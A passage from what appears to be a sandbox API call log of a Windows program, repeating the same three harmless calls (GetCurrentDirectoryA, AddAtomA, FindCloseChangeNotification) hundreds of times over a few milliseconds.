lpBuffer="Module32FirstW") returned 0x26 [0179.673] AddAtomA (lpString=0x0) returned 0x0 [0179.673] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.673] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.673] AddAtomA (lpString=0x0) returned 0x0 [0179.673] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.674] AddAtomA (lpString=0x0) returned 0x0 [0179.674] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.674] AddAtomA (lpString=0x0) returned 0x0 [0179.674] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.674] AddAtomA (lpString=0x0) returned 0x0 [0179.674] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.674] AddAtomA (lpString=0x0) returned 0x0 [0179.674] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.674] AddAtomA (lpString=0x0) returned 0x0 [0179.674] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.674] AddAtomA (lpString=0x0) returned 0x0 [0179.674] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.674] AddAtomA (lpString=0x0) returned 0x0 [0179.674] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.674] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.675] AddAtomA (lpString=0x0) returned 0x0 [0179.675] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.675] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.675] AddAtomA (lpString=0x0) returned 0x0 [0179.675] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.675] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.675] AddAtomA (lpString=0x0) returned 0x0 [0179.675] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.675] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.675] AddAtomA (lpString=0x0) returned 0x0 [0179.675] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.675] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.675] AddAtomA (lpString=0x0) returned 0x0 [0179.675] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.675] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.675] AddAtomA (lpString=0x0) returned 0x0 [0179.675] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.675] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.675] AddAtomA (lpString=0x0) returned 0x0 [0179.675] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.675] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.676] AddAtomA (lpString=0x0) returned 0x0 [0179.676] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.676] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.677] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.677] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.677] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.677] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.677] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.677] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.677] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.677] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.677] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.677] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.677] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.677] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.677] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.677] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.677] AddAtomA (lpString=0x0) returned 0x0 [0179.678] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.678] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.678] AddAtomA (lpString=0x0) returned 0x0 [0179.678] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.678] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.678] AddAtomA (lpString=0x0) returned 0x0 [0179.678] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.678] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.678] AddAtomA (lpString=0x0) returned 0x0 [0179.678] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.678] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.678] AddAtomA (lpString=0x0) returned 0x0 [0179.678] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.678] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.678] AddAtomA (lpString=0x0) returned 0x0 [0179.678] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.678] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.678] AddAtomA (lpString=0x0) returned 0x0 [0179.678] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.678] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.679] AddAtomA (lpString=0x0) returned 0x0 [0179.679] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.679] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.679] AddAtomA (lpString=0x0) returned 0x0 [0179.679] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.679] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.679] AddAtomA (lpString=0x0) returned 0x0 [0179.679] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.679] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.679] AddAtomA (lpString=0x0) returned 0x0 [0179.679] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.679] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.679] AddAtomA (lpString=0x0) returned 0x0 [0179.679] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.679] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.679] AddAtomA (lpString=0x0) returned 0x0 [0179.679] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.679] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.679] AddAtomA (lpString=0x0) returned 0x0 [0179.679] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.680] AddAtomA (lpString=0x0) returned 0x0 [0179.680] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.680] AddAtomA (lpString=0x0) returned 0x0 [0179.680] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.680] AddAtomA (lpString=0x0) returned 0x0 [0179.680] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.680] AddAtomA (lpString=0x0) returned 0x0 [0179.680] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.680] AddAtomA (lpString=0x0) returned 0x0 [0179.680] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.680] AddAtomA (lpString=0x0) returned 0x0 [0179.680] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.680] AddAtomA (lpString=0x0) returned 0x0 [0179.680] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.680] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.681] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.681] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.681] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.681] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.681] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.681] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.681] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.681] AddAtomA (lpString=0x0) returned 0x0 [0179.681] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.682] AddAtomA (lpString=0x0) returned 0x0 [0179.682] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.682] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.683] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.683] AddAtomA (lpString=0x0) returned 0x0 [0179.683] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.684] AddAtomA (lpString=0x0) returned 0x0 [0179.684] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.684] AddAtomA (lpString=0x0) returned 0x0 [0179.684] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.684] AddAtomA (lpString=0x0) returned 0x0 [0179.684] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.684] AddAtomA (lpString=0x0) returned 0x0 [0179.684] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.684] AddAtomA (lpString=0x0) returned 0x0 [0179.684] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.684] AddAtomA (lpString=0x0) returned 0x0 [0179.684] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.684] AddAtomA (lpString=0x0) returned 0x0 [0179.684] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.684] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.685] AddAtomA (lpString=0x0) returned 0x0 [0179.685] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.685] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.685] AddAtomA (lpString=0x0) returned 0x0 [0179.685] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.685] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.685] AddAtomA (lpString=0x0) returned 0x0 [0179.685] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.685] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.685] AddAtomA (lpString=0x0) returned 0x0 [0179.685] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.685] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.685] AddAtomA (lpString=0x0) returned 0x0 [0179.685] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.685] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.685] AddAtomA (lpString=0x0) returned 0x0 [0179.685] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.685] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.685] AddAtomA (lpString=0x0) returned 0x0 [0179.685] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.685] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.686] AddAtomA (lpString=0x0) returned 0x0 [0179.686] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.686] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.686] AddAtomA (lpString=0x0) returned 0x0 [0179.686] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.686] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.686] AddAtomA (lpString=0x0) returned 0x0 [0179.686] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.686] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.686] AddAtomA (lpString=0x0) returned 0x0 [0179.686] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.686] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.686] AddAtomA (lpString=0x0) returned 0x0 [0179.686] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.686] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.686] AddAtomA (lpString=0x0) returned 0x0 [0179.686] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.686] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.686] AddAtomA (lpString=0x0) returned 0x0 [0179.686] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.687] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.687] AddAtomA (lpString=0x0) returned 0x0 [0179.687] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.687] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.687] AddAtomA (lpString=0x0) returned 0x0 [0179.687] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.687] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.687] AddAtomA (lpString=0x0) returned 0x0 [0179.687] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.687] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.687] AddAtomA (lpString=0x0) returned 0x0 [0179.687] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.687] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.687] AddAtomA (lpString=0x0) returned 0x0 [0179.687] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.687] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.687] AddAtomA (lpString=0x0) returned 0x0 [0179.687] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.687] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.687] AddAtomA (lpString=0x0) returned 0x0 [0179.688] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.688] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.688] AddAtomA (lpString=0x0) returned 0x0 [0179.688] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.688] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.688] AddAtomA (lpString=0x0) returned 0x0 [0179.688] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.688] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.688] AddAtomA (lpString=0x0) returned 0x0 [0179.688] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.688] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.688] AddAtomA (lpString=0x0) returned 0x0 [0179.688] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.688] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.688] AddAtomA (lpString=0x0) returned 0x0 [0179.688] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.688] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.688] AddAtomA (lpString=0x0) returned 0x0 [0179.688] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.688] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.688] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.689] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.689] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.689] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.689] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.689] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.689] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.689] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.689] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.689] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.689] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.689] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.689] AddAtomA (lpString=0x0) returned 0x0 [0179.689] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.689] GetCurrentDirectoryA (in: nBufferLength=0x0, 